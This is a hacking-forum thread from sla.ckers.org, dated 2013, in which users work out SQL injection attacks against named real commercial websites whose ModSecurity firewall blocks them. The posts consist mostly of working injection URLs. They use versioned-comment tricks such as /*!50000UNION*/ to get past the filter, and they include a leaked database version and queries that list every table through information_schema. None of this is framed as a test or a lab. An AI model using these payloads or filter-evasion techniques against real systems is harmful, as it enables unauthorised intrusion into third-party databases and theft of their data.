Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
mod security block me again..
Posted by: kenjii
Date: November 25, 2013 09:34AM

hi all i can count the column but after mod security block me again...

with this sintaxe it seem to be ok but show nothing...

http://pardumansinghjewellers.com/product_detail.php?id=-29%20/*!UNunionION*/%20/*!SELselectECT*/%201,2,3,4,5,6--


somthing similar on this other link

http://www.earthquakesupplycenter.com/product_detail.php?id=68&subcatid=0&categoryid=-2+/*!UNunionION*/+/*!SELselectECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

and another one

http://vaultex.ae/viewProduct.php?parent=2&id=-134+union+select+1,2,3,4,5,6,7,8,9,10,11--



Edited 1 time(s). Last edit at 11/25/2013 03:27PM by kenjii.

Options: ReplyQuote
Re: mod security block me again..
Posted by: ajkaro
Date: November 28, 2013 11:52AM

use /*!50000UnIoN*/ /*!50000SeLeCt*/

second link: there are 13 columns :)

Options: ReplyQuote
Re: mod security block me again..
Posted by: kenjii
Date: November 29, 2013 01:14PM

thx very much this help me alot with a lot of website like this thank you !

Options: ReplyQuote
Re: mod security block me again..
Posted by: hack2012
Date: December 02, 2013 08:31PM

http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6

5.5.28-29.1

http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1

change 0,1 to 1,1 then you will find the diff

Options: ReplyQuote
Re: mod security block me again..
Posted by: ajkaro
Date: December 03, 2013 06:17PM

@hack2012

Why displaying one table in a time with limit if you can show all 6 tables at once:

hXXp://parduman[slackers]singhjewellers.com/product_detail.php?id=29 and 0/*!50000UNION*/ SELECT 1,2,/*!50000GrouP_Concat(table_name, 0x3c62723e)*/,4,5,6 from /*!50000information_schema*/.tables where table_schema=database()-- -

Options: ReplyQuote


Sorry, only registered users may post in this forum.